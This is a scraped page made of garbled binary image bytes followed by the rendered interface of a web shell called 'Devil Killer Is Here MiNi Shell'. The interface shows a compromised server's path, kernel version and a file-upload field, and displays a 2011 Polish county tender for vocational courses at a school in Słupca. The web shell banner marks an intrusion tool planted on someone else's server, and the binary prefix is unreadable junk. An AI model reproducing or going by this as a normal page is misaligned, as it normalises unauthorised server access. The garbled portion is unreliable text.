JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111209/419308-N-2011.html

<p class="kh_header"><b>Słupca: Usługi edukacyjne polegające na prowadzeniu Kursów zawodowych dla uczniów  Zespołu Szkół Ekonomicznych w Słupcy, dla którego organem prowadzącym jest Powiat Słupecki</b><br>
<b>Numer ogłoszenia: 419308 - 2011; data zamieszczenia: 09.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Słupecki , ul. Poznańska 20, 62-400 Słupca, woj. wielkopolskie, tel. 063 2758600, 2758624, faks 063 2758669.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-slupca.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi edukacyjne polegające na prowadzeniu Kursów zawodowych dla uczniów  Zespołu Szkół Ekonomicznych w Słupcy, dla którego organem prowadzącym jest Powiat Słupecki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamawiający  dopuszcza możliwość składania ofert częściowych (część A i część B)
2.Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie następujących kursów zawodowych:
Część A
2.1 KURS Prawa Jazdy:
2.1.1. Kategoria B  (15 os.  2 gr) czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013	            
2.1.2. Kategoria C i C+E  (15 os.  2 gr) czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013	            
Część B
2.2.KURS Dietetyk-15os. 2gr, po 40h zajęć, czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2012.
Uczniowie nabędą wiedzę i umiejętności z zakresu: podstawowych wiadomości z zakres nauki o żywieniu człowieka, rodzaju diet, ich charakterystyka, doboru produktów dozwolonych i niewskazanych, zasad żywienia dietetycznego w planowaniu jadłospisów w różnych schorzeniach.  Wykonawca zapewni niezbędne materiały szkoleniowe.
2.3.  KURS Florystyka- 15os. 2gr, po 50h zajęć: czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2011	             
Uczniowie  nabędą wiedzę i umiejętności z zakresu: podstawowych elementy i zasady kompozycji,  sporządzania wiązanek i ozdób ślubnych, dekoracji okolicznościowych.
Materiały szkoleniowe (kwiaty sztuczne, żywe, ozdoby, naczynia, dodatki bukieciarskie itp.), zapewni firma szkoleniowa. 
2.4.  KURS Kosmetyczny, wizaż i stylizacja paznokci- po 15 os. 2gr, po 100h,  zajęć czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2012.
Uczniowie nabędą wiedzę i umiejętności .z zakresu: anatomii i fizjologii człowieka, pielęgnacji skóry masażu twarzy, szyi i dekoltu, pielęgnacji oczu i ich oprawy, dłoni, nóg, stosowania preparatów kosmetycznych i upiększających.
Wykonawca zapewni niezbędne materiały szkoleniowe ( kosmetyki, sprzęt do wykonania makijażu , 
manikiuru i pedikiuru)
2.5.  KURS Opiekun osób zależnych- 15os. 2gr, po 40h zajęć, czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2012.	                          
Uczniowie nabędą wiedzę i umiejętności z zakresu: promocji zdrowia, poznanie cech i sylwetki osoby opiekującej się chorym i starym człowiekiem ,zmianami biologicznymi wieku starczego zmianami w psychice ludzi starych, chorobami wieku starego, pielęgnacją chorego leżącego, ćwiczenia-ośrodki pomocy społecznej, pierwszej pomocy.
Wykonawca zapewni niezbędne materiały szkoleniowe.

2.6. KURS Kadry i płace 15os. 2gr,po 90h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013                          	 
Ucz. nabędą wiedzę i umiejętności. z zakresu: Prawa pracy, rozliczenia delegacji, ubezpieczeń społecznych, rozliczeń podatku od osób fizycznych, sporządzenia listy płac, obsługi komputerowego programu kadrowo - płacowego, programu Płatnik
Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki )
2.7. KURS Księgowość komputerowa z obsługą programu INSERT GT -15os. 2gr, po 70h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	 
Uczniowie nabędą wiedzę i umiejętności z zakresu: zasad księgowości, dokumentacji finansowo-księgowej w firmie elementów prawa podatkowego, prowadzenia podatkowej księgi przychodów i rozchodów, rozliczenia z urzędem Skarbowym i ZUS oraz obsługi programu PŁATNIK, obsługi komputerowego programu INSERT GT Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki ).
2.8.  KURS Obsługa kasy fiskalnej- 15os. 2gr, po 12h zajęć,czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	            
Uczniowie  nabędą wiedzę i umiejętności z zakresu: przepisów prawnych regulujących warunki stosowania kas fiskalnych, budowy kasy, zasad obsługi funkcji kasy, rodzaji operacji wykonywanych na kasach fiskalnych-zajęcia praktyczne.
Wykonawca zobowiązuje się przeprowadzić szkolenie na min. 8 kasach 3 typach wraz z terminalem płatniczym oraz  zapewni niezbędne materiały szkoleniowe( odpowiednie dokumenty i druki).

2.9. Kurs Prowadzenie ksiąg przychodów i rozchodów - Płatnik- 15os. 2gr, po 70h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX2013.	                          	 
Ucz. nabędą wiedzę i umiejętności  z zakresu: prowadzenia  PKPiR, rodzaji operacji ujmowanych w PKPiR, elementami prawa podatkowego, rodzajami dowodów księgowych, metodami korygowania błędnych dowodów księgowych, dodatkowych ewidencji  koniecznej dla prawidłowego prowadzenia PKPiR, obsługi programu PŁATNIK
Wykonawca zapewni niezbędne materiały szkoleniowe (odpowiednie dokumenty i druki).
2.10.  Kurs  Własna działalność gospodarcza-15os. 2gr, po 20h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	 	            
Ucz. nabędą wiedzę i umiejętności z zakresu: czynności i dokumentów niezbędne do założenia firmy, wybór formy opodatkowania, dokumentacji w firmie Środki trwałe, rozliczeń z Urzędem Skarbowym i  ZUS, komunikacji interpersonalnej.
Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki ) .
2.11. KURS Zielona logistyka i zielony łańcuch dostaw w trosce o środowisko naturalne-15 os. 2gr, po  20h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	 	                       
Ucz. nabędą wiedzę i umiejętności  z zakresu: Zielona logistyka Zarządzanie łańcuchem dostaw Produkcja Zarządzanie Warsztat-symulacja harmonogramowania prac. 
Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki ).
2.12. Kurs barman, kelner z modułem j. angielskiego 15 osób 2gr, po 20h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013	            
Ucz. nabędą wiedzę i umiejętności z zakresu obsługi konsumenta gastronomicznego również w j .angielskim. Wykonawca zapewni niezbędne materiały szkoleniowe.
 
Usługi będą realizowane w Zespole Szkół Ekonomicznych w Słupcy. Szczegółowy zakres, ilość i rodzaj zajęć przewidzianych do realizacji określa przedstawiony opis. Jednostka 1 h w SIWZ używana jest w rozumieniu 1 godziny lekcyjnej, czyli 45 minut.

Oznaczenie wg Wspólnego Słownika Zamówień: Kod CPV- 80.53.00.00-8.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje kadrą  posiadającą kwalifikacje niezbędne do wykonania danego typu zadań oraz  doświadczeniem min. 3-letnim w wprowadzeniu podobnych kursów. Osoba/by realizujące zadania przedmiotu zamówienia zobowiązane są: a) posiadać wyższe wykształcenie pedagogiczne, b) kwalifikacje do prowadzenia danego typu zadań, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudniać nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli ( Dz.U. nr 50, poz. 400 z późn zm.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane wykształcenie i kwalifikacje do realizacji poszczególnych zadań</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>parafowany projekt umowy
formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie - 20</li>
<li>3 - Akredytacja - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:
1)termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
           - zawieszenia usług przez zamawiającego,
2)wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
   - zmiana stawki urzędowej podatku VAT,
   - rezygnacji z części usług, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - o wartość niewykonanych usług,
3)inne zmiany:
- w zakresie podwykonawstwa za uprzednią pisemną zgodą Zamawiającego,
- powierzenie podwykonawcom innej części zamówienia niż wskazana w ofercie wykonawcy,
- zmiana podwykonawcy na etapie realizacji zamówienia, o ile nie sprzeciwia się to postanowieniom SIWZ,
2.Tryb i warunki dokonywania zmian postanowień zawartej umowy w stosunku do treści oferty:
1)	inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
2)	uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów,
3)	forma zmian - aneks do umowy w formie pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-slupca.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Słupcy
ul. Poznańska 20
62-400 Słupca.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 09:30, miejsce: ZESPÓŁ SZKÓŁ EKONOMICZNYCH W SŁUPCY
ul. Powstańców Wlkp. 22 			
62-400 Słupca.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie publiczne realizowane w ramach :Projektu  Kwalifikacje na start 
współfinansowanego ze środków  Europejskiego Funduszu Społecznego w ramach Priorytet 9 Rozwój wykształcenia i kompetencji w regionach działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 KURS Prawa Jazdy:
.1.1. Kategoria B  (15 os.  2 gr) czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013	            
1.2. Kategoria C i C+E  (15 os.  2 gr) czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doswiadczenie - 20</li>
<li>3. Akredytacja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1 KURS Prawa Jazdy:
2.1.1. Kategoria B  (15 os.  2 gr) czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013	            
2.1.2. Kategoria C i C+E  (15 os.  2 gr) czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013	            
Część B
2.2.KURS Dietetyk-15os. 2gr, po 40h zajęć, czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2012.
Uczniowie nabędą wiedzę i umiejętności z zakresu: podstawowych wiadomości z zakres nauki o żywieniu człowieka, rodzaju diet, ich charakterystyka, doboru produktów dozwolonych i niewskazanych, zasad żywienia dietetycznego w planowaniu jadłospisów w różnych schorzeniach.  Wykonawca zapewni niezbędne materiały szkoleniowe.
2.3.  KURS Florystyka- 15os. 2gr, po 50h zajęć: czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2011	             
Uczniowie  nabędą wiedzę i umiejętności z zakresu: podstawowych elementy i zasady kompozycji,  sporządzania wiązanek i ozdób ślubnych, dekoracji okolicznościowych.
Materiały szkoleniowe (kwiaty sztuczne, żywe, ozdoby, naczynia, dodatki bukieciarskie itp.), zapewni firma szkoleniowa. 
2.4.  KURS Kosmetyczny, wizaż i stylizacja paznokci- po 15 os. 2gr, po 100h,  zajęć czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2012.
Uczniowie nabędą wiedzę i umiejętności .z zakresu: anatomii i fizjologii człowieka, pielęgnacji skóry masażu twarzy, szyi i dekoltu, pielęgnacji oczu i ich oprawy, dłoni, nóg, stosowania preparatów kosmetycznych i upiększających.
Wykonawca zapewni niezbędne materiały szkoleniowe ( kosmetyki, sprzęt do wykonania makijażu , 
manikiuru i pedikiuru)
2.5.  KURS Opiekun osób zależnych- 15os. 2gr, po 40h zajęć, czas realizacji: I  grupa XII.2011- IV.2012, II grupa I-XII 2012.	                          
Uczniowie nabędą wiedzę i umiejętności z zakresu: promocji zdrowia, poznanie cech i sylwetki osoby opiekującej się chorym i starym człowiekiem ,zmianami biologicznymi wieku starczego zmianami w psychice ludzi starych, chorobami wieku starego, pielęgnacją chorego leżącego, ćwiczenia-ośrodki pomocy społecznej, pierwszej pomocy.
Wykonawca zapewni niezbędne materiały szkoleniowe.

2.6. KURS Kadry i płace 15os. 2gr,po 90h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013                          	 
Ucz. nabędą wiedzę i umiejętności. z zakresu: Prawa pracy, rozliczenia delegacji, ubezpieczeń społecznych, rozliczeń podatku od osób fizycznych, sporządzenia listy płac, obsługi komputerowego programu kadrowo - płacowego, programu Płatnik
Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki )
2.7. KURS Księgowość komputerowa z obsługą programu INSERT GT -15os. 2gr, po 70h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	 
Uczniowie nabędą wiedzę i umiejętności z zakresu: zasad księgowości, dokumentacji finansowo-księgowej w firmie elementów prawa podatkowego, prowadzenia podatkowej księgi przychodów i rozchodów, rozliczenia z urzędem Skarbowym i ZUS oraz obsługi programu PŁATNIK, obsługi komputerowego programu INSERT GT Wykonawca zapewni niezbędne materiały szkoleniowe ( odpowiednie dokumenty i druki ).
2.8.  KURS Obsługa kasy fiskalnej- 15os. 2gr, po 12h zajęć,czas realizacji: I  grupa I- XII.2012, II grupa I-IX 2013.	                          	            
Uczniowie  nabędą wiedzę i umiejętności z zakresu: przepisów prawnych regulujących warunki stosowania kas fiskalnych, budowy kasy, zasad obsługi funkcji kasy, rodzaji operacji wykonywanych na kasach fiskalnych-zajęcia praktyczne.
Wykonawca zobowiązuje się przeprowadzić szkolenie na min. 8 kasach 3 typach wraz z terminalem płatniczym oraz  zapewni niezbędne materiały szkoleniowe( odpowiednie dokumenty i druki).

2.9. Kurs Prowadzenie ksiąg przychodów i rozchodów - Płatnik- 15os. 2gr, po 70h zajęć, czas realizacji: I  grupa I- XII.2012, II grupa I-IX2013.	                          	 
